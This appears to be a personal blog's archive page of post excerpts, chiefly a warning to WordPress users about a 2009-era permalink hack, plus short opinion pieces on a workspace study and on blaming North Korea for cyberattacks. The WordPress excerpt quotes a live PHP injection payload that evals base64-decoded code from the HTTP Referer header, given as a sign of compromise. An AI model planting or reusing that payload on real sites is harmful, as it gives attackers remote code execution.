Black holes, LHC, Star Wars, quantum uncertainty… if it is of general geek interest, but doesn’t fit into one of the other categories, it lands here.

Newsflash: people who don’t like computers prefer non-geeky workspaces

According to a recent study at the University of Washington, people who aren’t really interested in computing science are even less interested if asked about it in a room with science fiction paraphernalia, games, and soft drink cans. Apparently some of these non-technically-inclined people are women. Glory be, we have a great discovery!

Actually, not really, at least not in my uneducated opinion, with which you are free to disagree…

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

If you are running a WordPress-based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition, which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon. In the meantime, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e. not an administrative user) to run some administrator features, e.g. changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…

Cyberwar? No, malicious script kiddy

According to the lead Republican on the House Intelligence Committee, Peter Hoekstra, the U.S. should launch an all-out retaliation against North Korea for their role in the recent cyber attacks on American and South Korean internet targets. Unfortunately for the American people, Mr. Hoekstra is either an idiot, willfully ignorant, or intentionally twisting reality for his own political ends. The best experts in the industry agree that the attacks were launched by an attention-seeking amateur.